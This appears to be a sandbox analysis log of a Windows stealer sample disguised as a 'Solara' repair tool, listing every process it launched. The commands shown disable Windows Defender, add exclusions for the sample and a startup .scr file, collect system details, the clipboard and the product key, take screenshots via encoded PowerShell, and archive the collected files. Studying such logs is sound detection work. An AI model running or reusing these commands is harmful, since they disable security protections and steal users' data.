              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Users\user\Desktop\cmd.exe "C:\Users\user\Desktop\cmd.exe"Jump to behavior
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara has been repaired.', 0, 'Solara | Repaired', 48+16);close()""
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr'"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara has been repaired.', 0, 'Solara | Repaired', 48+16);close()"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES74CA.tmp" "c:\Users\user\AppData\Local\Temp\bcdu5fii\CSC91B7380AF2C2414A909984B12C6688DE.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\cmd.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\cmd.exeSection loaded: vcruntime140.dll
              Source: C:\Users\user\Desktop\cmd.exeSection loaded: version.dll
              Source: C:\Users\user\Desktop\cmd.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\cmd.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\cmd.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\cmd.exeSection loaded: python3.dll
              Source: C:\Users\user\Desktop\cmd.exeSection loaded: libffi-7.dll
              Source: C:\Users\user\Desktop\cmd.exeSection loaded: sqlite3.dll
              Source: C:\Users\user\Desktop\cmd.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\cmd.exeSection loaded: libcrypto-1_1.dll
              Source: C:\Users\user\Desktop\cmd.exeSection loaded: libssl-1_1.dll
              Source: C:\Users\user\Desktop\cmd.exeSection loaded: mswsock.dll
              Source: C:\Users\user\Desktop\cmd.exeSection loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\cmd.exeSection loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\cmd.exeSection loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\cmd.exeSection loaded: msasn1.dll
              Source: C:\Users\user\Desktop\cmd.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\cmd.exeSection loaded: dpapi.dll
              Source: C:\Users\user\Desktop\cmd.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
